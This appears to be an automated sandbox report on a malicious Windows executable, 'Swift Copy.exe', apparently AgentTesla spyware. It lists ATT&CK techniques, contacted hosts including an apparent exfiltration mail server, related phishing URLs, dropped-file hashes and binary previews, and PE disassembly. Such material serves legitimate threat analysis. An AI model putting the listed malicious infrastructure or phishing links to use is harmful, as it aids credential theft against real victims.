                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4142550881.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift Copy.exe PID: 1060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2840, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DF1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00DF1204
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DF1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00DF1806
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    221
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts
                    2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS138
                    System Information Discovery
                    Distributed Component Object Model221
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    2
                    Valid Accounts
                    LSA Secrets331
                    Security Software Discovery
                    SSH4
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials221
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Access Token Manipulation
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Swift Copy.exe65%ReversingLabsWin32.Trojan.Strab
                    Swift Copy.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://mail.mahesh-ent.com0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    172.67.74.152
                    truefalse
                      unknown
                      mail.mahesh-ent.com
                      148.66.136.151
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.mahesh-ent.comRegSvcs.exe, 00000001.00000002.4142550881.0000000003626000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003757000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003583000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.000000000335A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003710000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003394000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.00000000035BE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.ipify.orgSwift Copy.exe, 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://account.dyn.com/Swift Copy.exe, 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.org/tRegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        148.66.136.151
                        mail.mahesh-ent.comSingapore
                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                        172.67.74.152
                        api.ipify.orgUnited States
                        13335CLOUDFLARENETUSfalse
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1483051
                        Start date and time:2024-07-26 15:10:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Swift Copy.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/4@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 292
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: Swift Copy.exe
                        TimeTypeDescription
                        09:10:59API Interceptor13891369x Sleep call for process: RegSvcs.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        148.66.136.151DEBIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                          Invoice Copy.exeGet hashmaliciousAgentTeslaBrowse
                            Delivery Certificate.exeGet hashmaliciousAgentTeslaBrowse
                              invoices Focuson - 1342-000-0062.exeGet hashmaliciousAgentTeslaBrowse
                                Scanned Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                  Revised PO.exeGet hashmaliciousAgentTeslaBrowse
                                    Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                                      arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                        LOADING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                          SOA.exeGet hashmaliciousAgentTeslaBrowse
                                            172.67.74.152golang-modules.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                                            • api.ipify.org/?format=wef
                                            K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            stub.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            stub.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/?format=json
                                            Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/?format=json
                                            Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                            • api.ipify.org/?format=json
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.mahesh-ent.comDEBIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Invoice Copy.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Delivery Certificate.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            invoices Focuson - 1342-000-0062.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Scanned Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Revised PO.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            arrival notice.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            LOADING ADVICE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            SOA.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            api.ipify.orgSecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            ynhHNexysa.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            2FBexXRCHR.rtfGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            https://pub-bc1e99c17d21413c8c62ead228907d1f.r2.dev/auth_gen.html?folder=inf0gudkij&module&user-agent=Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.75+Safari/537.36Get hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                            • 104.26.13.205
                                            https://b14d.lnsd.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                            • 104.26.13.205
                                            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            LisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            LisectAVT_2403002A_460.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AS-26496-GO-DADDY-COM-LLCUSfile.exeGet hashmaliciousSystemBCBrowse
                                            • 132.148.72.102
                                            LisectAVT_2403002A_2.exeGet hashmaliciousAgentTeslaBrowse
                                            • 182.50.135.77
                                            LisectAVT_2403002A_59.exeGet hashmaliciousAgentTeslaBrowse
                                            • 182.50.135.77
                                            DEBIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.136.151
                                            httP://151.28.168.184.host.secureserver.net/documento=24/07/2024/U04cVk3Ovkp..VkcI/6VnUVdvU8k1Oz8c2H4/maud.gaume@gmail.com-282072__;!!P3IToRM6tg!mhHYI3NP1FN47238PV4Ejpyi3ZOkGxwJydSJnD9HyjmCKYq9ZCB_iRj7Oz_yw96WdDsvl9wksR7V4C9z2rZDtUTV_FwEQ6ffgUAMko4$Get hashmaliciousUnknownBrowse
                                            • 184.168.28.151
                                            LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                            • 166.62.6.144
                                            LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                                            • 148.66.145.151
                                            https://msms.live/index.phpGet hashmaliciousUnknownBrowse
                                            • 118.139.181.13
                                            http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                            • 192.169.151.159
                                            http://www.acproyectosdeingenieria.comGet hashmaliciousUnknownBrowse
                                            • 192.169.151.159
                                            CLOUDFLARENETUShttps://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                                            • 104.18.11.207
                                            https://forms.office.com/Pages/ResponsePage.aspx?id=F0il39lMqEiGOt9WRpZx4wvO-e767m5Jgq527TAyuTxUNFdESUY2VVdIOU5UTDkxN01BVUg0V1dIWi4uGet hashmaliciousUnknownBrowse
                                            • 104.18.11.213
                                            Built.exeGet hashmaliciousBlank GrabberBrowse
                                            • 162.159.135.233
                                            One_Docx 1.pdfGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            file.exeGet hashmaliciousBabadedaBrowse
                                            • 172.64.41.3
                                            RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 188.114.96.3
                                            PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                            • 172.67.149.169
                                            https://dcmonetshare.transfernow.net/dl/20240726wXlk6l3qGet hashmaliciousUnknownBrowse
                                            • 104.17.25.14
                                            PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                            • 104.21.29.191
                                            DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                            • 188.114.96.3
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://pendingdelivery864.s3.us-east.cloud-object-storage.appdomain.cloud/%2540%2523%2524%2525%255E%2526%2526()(%2526%2526%255E%255E%2525%2525%2524%2524%2524%2523%2523.html#nogueira@carboclor.com.arGet hashmaliciousUnknownBrowse
                                            • 172.67.74.152
                                            6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                            • 172.67.74.152
                                            Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                                            • 172.67.74.152
                                            https://rtntrack.rediff.com/click?url=___https://www.firstpost.com/health/covid-19-puts-kidney-patients-at-high-risk-as-poor-immunity-ill-equipped-dialysis-centres-exposes-patients-to-infection-8627161.html___&service=instasearch&clientip=66.249.79.152&pos=readfullarticle&Ruw=&Rl=&q=&destinationurl=https://My.ha51000.com/.de/c2FsbHkuYmVldHlAcXVpbHRlci5jb20=Get hashmaliciousPhisherBrowse
                                            • 172.67.74.152
                                            http://cursostop10.com.br/adm/rudd/?email=nathalie.petillon@chirec.beGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.74.152
                                            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                            • 172.67.74.152
                                            SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            http://cs9.bizGet hashmaliciousUnknownBrowse
                                            • 172.67.74.152
                                            https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.auGet hashmaliciousHTMLPhisherBrowse
                                            • 172.67.74.152
                                            new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 172.67.74.152
                                            No context
                                            Process:C:\Users\user\Desktop\Swift Copy.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):161516
                                            Entropy (8bit):7.947331554287979
                                            Encrypted:false
                                            SSDEEP:3072:KRSNDYd1XPxW2vibJqW9q/HngtfS0eHKfRfdVkoMjTbVxFv4kEcT0wcR:9DiJlvidwvngtfFe8WlTbt0cT0J
                                            MD5:6CD088661DC4053D8E330E00706C485D
                                            SHA1:94A616E6FEF50F6C518E47A15B55BA6CBD8114EA
                                            SHA-256:B1F26744EB52C85A0B860DB114A95BC67016842DAA55A92471927BB39EC9054A
                                            SHA-512:8D31656EC2028746C1054EA11F57C3F759A3FBD3ECBD8E7DC85DBD483C8886B6FE17D44E0EA46DFCA77425F94862FA4B95401674B56EBCA6922EC56E36756F75
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06.....C..*.>.S...nn..U.V.4..Zs1...Z...T.V..J...2..j.`...@.q...(..]r...-..<[)i.O..+..}Z.Mf....]'...y.^.?.J/S.4Z%v.Xdr:...Y../....G).XUn.H.AaUp.|.4U.m".P.....6.N.t.?.M.Mn`...s..U...%^.Z..H..].M^.R..Wb.Y.l.....\..h.*.|... ...p.......S)1Z..G.C.V.A~../..5....{:..j.....fs.d..t..*5z.H......@....S..2J..\..G..GF.N.L..O......Vi.k...-...:X..M..j......].D..H..w....@.k...V.W..5N.C.L. .Mb.6..t~.........|Q...W....9...A..}..g.Q..Vnt......@............v...^~|.}{......z.rc7.k.>.u.X.V...m..2...=.w..t.F._..%K.q|..."uR.`.....t..5.........]m..C!...I....Mf....a...W:.6W...{U.\2.y..j7......wr..<....vstp..P..I.2.p.Y...&........t.......F.:.0.A...%` .H........n............i....o.........b..$.I]....L..,.>......u.....+.].....F..{.f.5.R.4:.z.5.A'...r..*.z.".P...1.f.3t..;...C..{~.8...(.y......8....X..y..L.X.ii.......l.1..q5..Uh..W?.O.3..*.....2...C..T.?..@t..Z.Q.S.w....V.Wvt..j.J..'3.,.,.._*.*.i...w..ng..V.sZ.Zs5...Z.6.V.W,...^Ch.L......b.U(T.:.?q...3.)....B*.*...F..b..D.O......R.
                                            Process:C:\Users\user\Desktop\Swift Copy.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9786
                                            Entropy (8bit):7.633512104066495
                                            Encrypted:false
                                            SSDEEP:192:Z6E+bT+X/8ER7PVz6sNiDrFdZMecXWHLNcaWab8YFek7Ce43nwKHpWi:Z6dwXRhNiHBNFee43nwkd
                                            MD5:F5CAA385F664413AC50BB3044C0A646B
                                            SHA1:DDECF5D6F4A29AD66D83B08415ACAFB5B9FAE790
                                            SHA-256:9459EA28DB10DAB8B001200A492CB833F16C8F77EB15A486ECBBFA77F35DC2C2
                                            SHA-512:AE38D0C80F9B8578D380E7F725F3D3420A84D0754836F85B317CCAD6DEF96D5D21882D2C1FD1518C0E45E4BF4EFF043CAC2C10262C096953007D606B1290276B
                                            Malicious:false
                                            Reputation:low
                                            Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...
                                            Process:C:\Users\user\Desktop\Swift Copy.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):242688
                                            Entropy (8bit):6.844755488606319
                                            Encrypted:false
                                            SSDEEP:6144:O4nEDXeOdKqJcpvVHRuKFboPkF4ZyrY8cukW2ZWF25geyU:hEDXeOdKTNuKS8cu/oF5gJU
                                            MD5:34163538E05B27690C424A2C4A65C54F
                                            SHA1:419B6AFF7E1BC6E3C98CD98ED901DBDA886A4735
                                            SHA-256:15BBF52A4DBCBB56EAC1CED4390F1A8A670C2F040E86307F6AE7D69F293F8DAC
                                            SHA-512:64EF43DFCDC56929C3B2E460AE831F52C756ECB83EC924A9EA9FDD4E2FE9DF58D643E03CEDA9829EEB66AF411E01977C8B228ED1BC983A8B0434B4CC62A048D7
                                            Malicious:false
                                            Reputation:low
                                            Preview:...BYOISURWV.MU.ZYH6V91.NL5SGTTBZOISQRWV2YMUFZYH6V91ANL5SGT.BZOGL.\W.;.l.G..ib>PBa>>Z4559b9.'=>&w4Wy? (z0&..vba##Q6iYYH~OISQRWVb.MU.[ZH...WANL5SGTT.ZMHXPYWV.ZMUNZYH6V9..ML5sGTT.YOIS.RWv2YMWFZ]H6V91ANH5SGTTBZOiWQRUV2YMUFXY..V9!AN\5SGTDBZ_ISQRWV"YMUFZYH6V91%.O5.GTTB.LI.TRWV2YMUFZYH6V91ANL5SCTXBZOISQRWV2YMUFZYH6V91ANL5SGTTBZOISQRWV2YMUFZYH6V91ANl5SOTTBZOISQRWV:yMU.ZYH6V91ANL5}31,6ZOI..QWV.YMU.YYH4V91ANL5SGTTBZOiSQ2y$A+.UFZ.M6V9.BNL3SGT.AZOISQRWV2YMUF.YHvxKT-!/5SKTTBZOMSQPWV2.NUFZYH6V91ANL5.GT.BZOISQRWV2YMUFZY..U91ANL}SGTVB_O..SRCb3YNUFZXH6P91ANL5SGTTBZOISQRWV2YMUFZYH6V91ANL5SGTTBZOISQRWV/....v~+.;#I... .W..\..(..YsL..R..p[......&A..B.@y..^... .R\17.....tUX6Z<.-`F2.O..n.pt2...08.K...Ka.:Rf.f...tt...Z2...."."!!.27$8't.(50 >.0.LUFZY......\+..yAUQ}A)....yG>....G1AN(5SG&TBZ.ISQ.WV26MUF4YH6(91A0L5S.TTB.OISfRWV.YMU+ZYH.V91?NL5.:[[.. ..WV2YM`..i.[....{...b%.$.+k...2....C..G^.Nr....].?..X.8Wq..5XKQCX^L5Z.?....rEPPGXHMP]oY...t.|....0....=.(BZOISQ.WV.YMU..Y.6V9.A.L..GTT.O.S.R..Y
                                            Process:C:\Users\user\Desktop\Swift Copy.exe
                                            File Type:ASCII text, with very long lines (28674), with no line terminators
                                            Category:dropped
                                            Size (bytes):28674
                                            Entropy (8bit):3.5846985612734055
                                            Encrypted:false
                                            SSDEEP:768:JxBr6ScFCo3T3iC+vt63YntRUu+nZ+nskm/Qsl2HzpmL5sCWi:Zr6ScFCo3T3i3vt63YntRUu+nZ+nskmj
                                            MD5:C4BDFCB1D9DA324C392DB3DD5764F5F5
                                            SHA1:A81B6810C72A5A7A0755426F3F43212DB3157EA2
                                            SHA-256:3366300DC7921DA2C669E79333FA7183EB774AE32C9EEDC3DC03013243180810
                                            SHA-512:D22BE095D7DFCBB7048DE050DF49D8447FC54868232E7E3D0C333EA9C4EFD3C5F5A5EF98CC642E7E470FF07E659BF4C7D6373EAE6B3E36FB614DD8792AE5A99C
                                            Malicious:false
                                            Reputation:low
                                            Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.842669417324991
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Swift Copy.exe
                                            File size:1'294'336 bytes
                                            MD5:2ad0a14a883597c8707276c3002d85da
                                            SHA1:5840f94ca6dc35f3e48f7e0586e3a9724fb566d0
                                            SHA256:c7dc84187ebfc4521a3fe173e5b59850c753251a1a935b294c0a6fb63d6c9315
                                            SHA512:2c05d6c33359ae405479a6ca9b8019fc885f8c1f16e4a658f809b586336e20fc5c9dc1ac6f2ab4fbd2703a3be2716c510f26335e2a806e933dc2ef265761c288
                                            SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8ajYRRFPpDsb/5bxD17Ofd:NTvC/MTQYxsWR7ajYRRJpDsTVxD17Of
                                            TLSH:AC55590323BDC0E2FE9EBD720A56A31146786D160132E51FD25F3DE9E973163C6296E2
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                            Icon Hash:07d8d8d4d4d85026
                                            Entrypoint:0x420577
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66A237C7 [Thu Jul 25 11:32:23 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:948cc502fe9226992dce9417f952fce3
                                            Instruction
                                            call 00007F4A68B25163h
                                            jmp 00007F4A68B24A6Fh
                                            push ebp
                                            mov ebp, esp
                                            push esi
                                            push dword ptr [ebp+08h]
                                            mov esi, ecx
                                            call 00007F4A68B24C4Dh
                                            mov dword ptr [esi], 0049FDF0h
                                            mov eax, esi
                                            pop esi
                                            pop ebp
                                            retn 0004h
                                            and dword ptr [ecx+04h], 00000000h
                                            mov eax, ecx
                                            and dword ptr [ecx+08h], 00000000h
